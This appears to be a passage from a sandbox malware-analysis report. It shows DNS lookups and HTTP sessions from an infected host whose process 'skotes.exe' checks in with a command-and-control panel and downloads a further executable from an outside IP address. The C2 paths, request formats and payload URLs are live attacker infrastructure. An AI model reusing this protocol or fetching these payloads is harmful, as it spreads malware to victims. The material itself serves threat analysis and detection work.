Dec 10, 2024 11:11:48.674967051 CET	1.1.1.1	192.168.2.5	0x40ea	No error (0)	content-signature-chains.prod.autograph.services.mozaws.net	prod.content-signature-chains.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 11:11:48.674967051 CET	1.1.1.1	192.168.2.5	0x40ea	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net		34.160.144.191	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:48.729341984 CET	1.1.1.1	192.168.2.5	0xbfaf	No error (0)	firefox.settings.services.mozilla.com	prod.remote-settings.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 11:11:48.729341984 CET	1.1.1.1	192.168.2.5	0xbfaf	No error (0)	prod.remote-settings.prod.webservices.mozgcp.net		34.149.100.209	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:48.736778021 CET	1.1.1.1	192.168.2.5	0xd67f	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:48.760133028 CET	1.1.1.1	192.168.2.5	0xa88e	No error (0)	shavar.services.mozilla.com	shavar.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 11:11:48.769222021 CET	1.1.1.1	192.168.2.5	0x2861	No error (0)	youtube.com		142.250.181.78	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:48.769336939 CET	1.1.1.1	192.168.2.5	0xb07d	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:48.770829916 CET	1.1.1.1	192.168.2.5	0x4651	No error (0)	prod.ads.prod.webservices.mozgcp.net		34.117.188.166	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:48.916380882 CET	1.1.1.1	192.168.2.5	0xfc0f	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net			28	IN (0x0001)	false
Dec 10, 2024 11:11:48.918086052 CET	1.1.1.1	192.168.2.5	0x2fa3	No error (0)	youtube.com			28	IN (0x0001)	false
Dec 10, 2024 11:11:49.221622944 CET	1.1.1.1	192.168.2.5	0xcfa3	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net		34.160.144.191	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:49.402790070 CET	1.1.1.1	192.168.2.5	0xef10	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net			28	IN (0x0001)	false
Dec 10, 2024 11:11:49.833842993 CET	1.1.1.1	192.168.2.5	0x3f71	No error (0)	example.org		93.184.215.14	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:49.834018946 CET	1.1.1.1	192.168.2.5	0x817b	No error (0)	ipv4only.arpa		192.0.0.170	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:49.834018946 CET	1.1.1.1	192.168.2.5	0x817b	No error (0)	ipv4only.arpa		192.0.0.171	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:49.878678083 CET	1.1.1.1	192.168.2.5	0x4e36	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 11:11:49.878678083 CET	1.1.1.1	192.168.2.5	0x4e36	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:49.956779957 CET	1.1.1.1	192.168.2.5	0x546d	No error (0)	prod.remote-settings.prod.webservices.mozgcp.net		34.149.100.209	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:50.135200977 CET	1.1.1.1	192.168.2.5	0xd90c	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:50.142179966 CET	1.1.1.1	192.168.2.5	0x6751	No error (0)	contile.services.mozilla.com		34.117.188.166	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:50.142782927 CET	1.1.1.1	192.168.2.5	0x8677	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:50.320664883 CET	1.1.1.1	192.168.2.5	0xf379	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:50.520656109 CET	1.1.1.1	192.168.2.5	0x6b7e	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:51.543982983 CET	1.1.1.1	192.168.2.5	0x2543	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.212888956 CET	1.1.1.1	192.168.2.5	0xbfef	No error (0)	www.facebook.com	star-mini.c10r.facebook.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 11:11:52.212888956 CET	1.1.1.1	192.168.2.5	0xbfef	No error (0)	star-mini.c10r.facebook.com		157.240.195.35	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.212898970 CET	1.1.1.1	192.168.2.5	0xb479	No error (0)	www.youtube.com	youtube-ui.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 11:11:52.212898970 CET	1.1.1.1	192.168.2.5	0xb479	No error (0)	youtube-ui.l.google.com		172.217.17.78	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.212898970 CET	1.1.1.1	192.168.2.5	0xb479	No error (0)	youtube-ui.l.google.com		142.250.181.78	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.212898970 CET	1.1.1.1	192.168.2.5	0xb479	No error (0)	youtube-ui.l.google.com		142.250.181.14	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.212898970 CET	1.1.1.1	192.168.2.5	0xb479	No error (0)	youtube-ui.l.google.com		172.217.21.46	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.212898970 CET	1.1.1.1	192.168.2.5	0xb479	No error (0)	youtube-ui.l.google.com		142.250.181.142	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.212898970 CET	1.1.1.1	192.168.2.5	0xb479	No error (0)	youtube-ui.l.google.com		142.250.181.110	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.212898970 CET	1.1.1.1	192.168.2.5	0xb479	No error (0)	youtube-ui.l.google.com		172.217.19.238	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.212898970 CET	1.1.1.1	192.168.2.5	0xb479	No error (0)	youtube-ui.l.google.com		216.58.208.238	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.212898970 CET	1.1.1.1	192.168.2.5	0xb479	No error (0)	youtube-ui.l.google.com		172.217.17.46	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.212898970 CET	1.1.1.1	192.168.2.5	0xb479	No error (0)	youtube-ui.l.google.com		172.217.19.206	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.212898970 CET	1.1.1.1	192.168.2.5	0xb479	No error (0)	youtube-ui.l.google.com		172.217.19.174	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.212909937 CET	1.1.1.1	192.168.2.5	0xf347	No error (0)	www.wikipedia.org	dyna.wikimedia.org		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 11:11:52.212909937 CET	1.1.1.1	192.168.2.5	0xf347	No error (0)	dyna.wikimedia.org		185.15.58.224	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.369743109 CET	1.1.1.1	192.168.2.5	0x3670	No error (0)	star-mini.c10r.facebook.com		157.240.196.35	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.502052069 CET	1.1.1.1	192.168.2.5	0xf5e0	No error (0)	dyna.wikimedia.org		185.15.58.224	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.502065897 CET	1.1.1.1	192.168.2.5	0x442d	No error (0)	youtube-ui.l.google.com		142.250.181.142	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.502065897 CET	1.1.1.1	192.168.2.5	0x442d	No error (0)	youtube-ui.l.google.com		172.217.17.78	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.502065897 CET	1.1.1.1	192.168.2.5	0x442d	No error (0)	youtube-ui.l.google.com		172.217.17.46	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.502065897 CET	1.1.1.1	192.168.2.5	0x442d	No error (0)	youtube-ui.l.google.com		172.217.21.46	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.502065897 CET	1.1.1.1	192.168.2.5	0x442d	No error (0)	youtube-ui.l.google.com		142.250.181.110	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.502065897 CET	1.1.1.1	192.168.2.5	0x442d	No error (0)	youtube-ui.l.google.com		216.58.208.238	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.502065897 CET	1.1.1.1	192.168.2.5	0x442d	No error (0)	youtube-ui.l.google.com		142.250.181.78	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.502065897 CET	1.1.1.1	192.168.2.5	0x442d	No error (0)	youtube-ui.l.google.com		172.217.19.174	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.502065897 CET	1.1.1.1	192.168.2.5	0x442d	No error (0)	youtube-ui.l.google.com		172.217.19.238	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.502065897 CET	1.1.1.1	192.168.2.5	0x442d	No error (0)	youtube-ui.l.google.com		172.217.19.206	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.502065897 CET	1.1.1.1	192.168.2.5	0x442d	No error (0)	youtube-ui.l.google.com		142.250.181.14	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.516136885 CET	1.1.1.1	192.168.2.5	0xdfd0	No error (0)	star-mini.c10r.facebook.com			28	IN (0x0001)	false
Dec 10, 2024 11:11:52.704374075 CET	1.1.1.1	192.168.2.5	0xb5a5	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Dec 10, 2024 11:11:52.704374075 CET	1.1.1.1	192.168.2.5	0xb5a5	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Dec 10, 2024 11:11:52.704374075 CET	1.1.1.1	192.168.2.5	0xb5a5	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Dec 10, 2024 11:11:52.704374075 CET	1.1.1.1	192.168.2.5	0xb5a5	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Dec 10, 2024 11:11:52.704408884 CET	1.1.1.1	192.168.2.5	0xb0bb	No error (0)	dyna.wikimedia.org			28	IN (0x0001)	false
Dec 10, 2024 11:11:52.704417944 CET	1.1.1.1	192.168.2.5	0x4650	No error (0)	www.reddit.com	reddit.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 11:11:52.704417944 CET	1.1.1.1	192.168.2.5	0x4650	No error (0)	reddit.map.fastly.net		151.101.193.140	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.704417944 CET	1.1.1.1	192.168.2.5	0x4650	No error (0)	reddit.map.fastly.net		151.101.65.140	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.704417944 CET	1.1.1.1	192.168.2.5	0x4650	No error (0)	reddit.map.fastly.net		151.101.129.140	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.704417944 CET	1.1.1.1	192.168.2.5	0x4650	No error (0)	reddit.map.fastly.net		151.101.1.140	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.854433060 CET	1.1.1.1	192.168.2.5	0x6dde	No error (0)	support.mozilla.org	prod.sumo.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 11:11:52.854433060 CET	1.1.1.1	192.168.2.5	0x6dde	No error (0)	prod.sumo.prod.webservices.mozgcp.net	us-west1.prod.sumo.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 11:11:52.854433060 CET	1.1.1.1	192.168.2.5	0x6dde	No error (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net		34.149.128.2	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.854446888 CET	1.1.1.1	192.168.2.5	0x7c90	No error (0)	twitter.com		104.244.42.193	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.915374994 CET	1.1.1.1	192.168.2.5	0x3153	No error (0)	reddit.map.fastly.net		151.101.1.140	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.915374994 CET	1.1.1.1	192.168.2.5	0x3153	No error (0)	reddit.map.fastly.net		151.101.65.140	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.915374994 CET	1.1.1.1	192.168.2.5	0x3153	No error (0)	reddit.map.fastly.net		151.101.129.140	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.915374994 CET	1.1.1.1	192.168.2.5	0x3153	No error (0)	reddit.map.fastly.net		151.101.193.140	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.995630980 CET	1.1.1.1	192.168.2.5	0x9395	No error (0)	twitter.com		104.244.42.193	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.998142004 CET	1.1.1.1	192.168.2.5	0x632e	No error (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net		34.149.128.2	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:53.979227066 CET	1.1.1.1	192.168.2.5	0x5ed	Name error (3)	246.229.1.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Dec 10, 2024 11:11:54.867331028 CET	1.1.1.1	192.168.2.5	0x5174	No error (0)	api.mylnikov.org		172.67.196.114	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:54.867331028 CET	1.1.1.1	192.168.2.5	0x5174	No error (0)	api.mylnikov.org		104.21.44.66	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:54.867341042 CET	1.1.1.1	192.168.2.5	0x5174	No error (0)	api.mylnikov.org		172.67.196.114	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:54.867341042 CET	1.1.1.1	192.168.2.5	0x5174	No error (0)	api.mylnikov.org		104.21.44.66	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:12:01.418723106 CET	1.1.1.1	192.168.2.5	0x2fc8	No error (0)	discord.com		162.159.128.233	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:12:01.418723106 CET	1.1.1.1	192.168.2.5	0x2fc8	No error (0)	discord.com		162.159.135.232	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:12:01.418723106 CET	1.1.1.1	192.168.2.5	0x2fc8	No error (0)	discord.com		162.159.136.232	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:12:01.418723106 CET	1.1.1.1	192.168.2.5	0x2fc8	No error (0)	discord.com		162.159.138.232	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:12:01.418723106 CET	1.1.1.1	192.168.2.5	0x2fc8	No error (0)	discord.com		162.159.137.232	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:12:04.741650105 CET	1.1.1.1	192.168.2.5	0x4ed2	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 11:12:04.741650105 CET	1.1.1.1	192.168.2.5	0x4ed2	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:12:08.510260105 CET	1.1.1.1	192.168.2.5	0xb6b3	No error (0)	dyna.wikimedia.org		185.15.58.224	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:12:08.621319056 CET	1.1.1.1	192.168.2.5	0xb6b3	No error (0)	dyna.wikimedia.org		185.15.58.224	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:12:08.824465990 CET	1.1.1.1	192.168.2.5	0x432c	No error (0)	dyna.wikimedia.org			28	IN (0x0001)	false
Dec 10, 2024 11:12:08.899120092 CET	1.1.1.1	192.168.2.5	0x432c	No error (0)	dyna.wikimedia.org			28	IN (0x0001)	false
Dec 10, 2024 11:12:24.147978067 CET	1.1.1.1	192.168.2.5	0x6e4d	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 11:12:24.147978067 CET	1.1.1.1	192.168.2.5	0x6e4d	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:12:33.885448933 CET	1.1.1.1	192.168.2.5	0x6d26	No error (0)	services.addons.mozilla.org		151.101.1.91	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:12:33.885448933 CET	1.1.1.1	192.168.2.5	0x6d26	No error (0)	services.addons.mozilla.org		151.101.193.91	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:12:33.885448933 CET	1.1.1.1	192.168.2.5	0x6d26	No error (0)	services.addons.mozilla.org		151.101.65.91	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:12:33.885448933 CET	1.1.1.1	192.168.2.5	0x6d26	No error (0)	services.addons.mozilla.org		151.101.129.91	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:12:33.939378023 CET	1.1.1.1	192.168.2.5	0x1131	No error (0)	normandy.cdn.mozilla.net	normandy-cdn.services.mozilla.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 11:12:33.939378023 CET	1.1.1.1	192.168.2.5	0x1131	No error (0)	normandy-cdn.services.mozilla.com		35.201.103.21	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:12:34.079349995 CET	1.1.1.1	192.168.2.5	0xd38b	No error (0)	services.addons.mozilla.org		151.101.129.91	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:12:34.079349995 CET	1.1.1.1	192.168.2.5	0xd38b	No error (0)	services.addons.mozilla.org		151.101.65.91	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:12:34.079349995 CET	1.1.1.1	192.168.2.5	0xd38b	No error (0)	services.addons.mozilla.org		151.101.193.91	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:12:34.079349995 CET	1.1.1.1	192.168.2.5	0xd38b	No error (0)	services.addons.mozilla.org		151.101.1.91	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:12:34.089876890 CET	1.1.1.1	192.168.2.5	0xa29c	No error (0)	normandy-cdn.services.mozilla.com		35.201.103.21	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:12:34.266124964 CET	1.1.1.1	192.168.2.5	0x9726	No error (0)	services.addons.mozilla.org			28	IN (0x0001)	false
Dec 10, 2024 11:12:34.266124964 CET	1.1.1.1	192.168.2.5	0x9726	No error (0)	services.addons.mozilla.org			28	IN (0x0001)	false
Dec 10, 2024 11:12:34.266124964 CET	1.1.1.1	192.168.2.5	0x9726	No error (0)	services.addons.mozilla.org			28	IN (0x0001)	false
Dec 10, 2024 11:12:34.266124964 CET	1.1.1.1	192.168.2.5	0x9726	No error (0)	services.addons.mozilla.org			28	IN (0x0001)	false
Dec 10, 2024 11:12:35.359581947 CET	1.1.1.1	192.168.2.5	0x3507	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 11:12:35.359581947 CET	1.1.1.1	192.168.2.5	0x3507	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:12:35.359707117 CET	1.1.1.1	192.168.2.5	0x3507	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 11:12:35.359707117 CET	1.1.1.1	192.168.2.5	0x3507	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:12:36.728108883 CET	1.1.1.1	192.168.2.5	0x1175	No error (0)	a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com	a17.rackcdn.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 11:12:36.728108883 CET	1.1.1.1	192.168.2.5	0x1175	No error (0)	a17.rackcdn.com	a17.rackcdn.com.mdc.edgesuite.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49816	185.215.113.43	80	1708	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 11:11:03.665200949 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 11:11:04.935367107 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 10 Dec 2024 10:11:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49827	185.215.113.43	80	1708	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 11:11:06.576406002 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 42 37 34 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12B74B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 10, 2024 11:11:07.919691086 CET	770	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 10 Dec 2024 10:11:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 34 33 0d 0a 20 3c 63 3e 31 30 31 33 36 37 35 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 39 61 32 61 63 30 31 30 31 65 65 37 30 34 62 64 31 38 31 36 30 33 37 64 63 62 63 38 66 64 31 30 65 62 66 62 39 61 35 35 33 36 65 36 23 31 30 31 33 36 37 36 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 65 37 65 37 62 39 63 61 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 31 33 36 37 37 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 38 65 36 62 31 63 61 37 32 64 64 35 33 34 64 62 30 35 37 65 62 34 31 30 61 34 39 34 64 39 64 23 31 30 31 33 36 37 38 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 [TRUNCATED] Data Ascii: 243 <c>1013675001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fb9a2ac0101ee704bd1816037dcbc8fd10ebfb9a5536e6#1013676001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1013677001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1013678001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8fcf7b8c730804042ba5ce902415450#1013679001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#1013680001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbde719b5059bb01ab5e45425197d1aa1daaa8#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49828	31.41.244.11	80	1708	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 11:11:08.045870066 CET	66	OUT	GET /files/1521297942/H3tyh96.exe HTTP/1.1 Host: 31.41.244.11
Dec 10, 2024 11:11:09.373126030 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 10 Dec 2024 10:11:09 GMT Content-Type: application/octet-stream Content-Length: 1765888 Last-Modified: Tue, 10 Dec 2024 09:46:58 GMT Connection: keep-alive ETag: "67580e12-1af200" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 d4 1d e4 63 00 00 00 00 00 00 00 00 e0 00 02 00 0b 01 08 00 00 16 01 00 00 08 00 00 00 00 00 00 00 e0 45 00 00 20 00 00 00 40 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 46 00 00 04 00 00 25 99 1b 00 02 00 40 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 60 01 00 69 00 00 00 00 40 01 00 c8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 61 01 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELcE @@ F%@U`i@a @.rsrc@@.idata `@ *@kzyimikk +@vgdirfva E@.taggant@E"@
Dec 10, 2024 11:11:09.373162031 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 11:11:09.373182058 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 11:11:09.373270035 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 11:11:09.373281002 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 11:11:09.373287916 CET	672	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
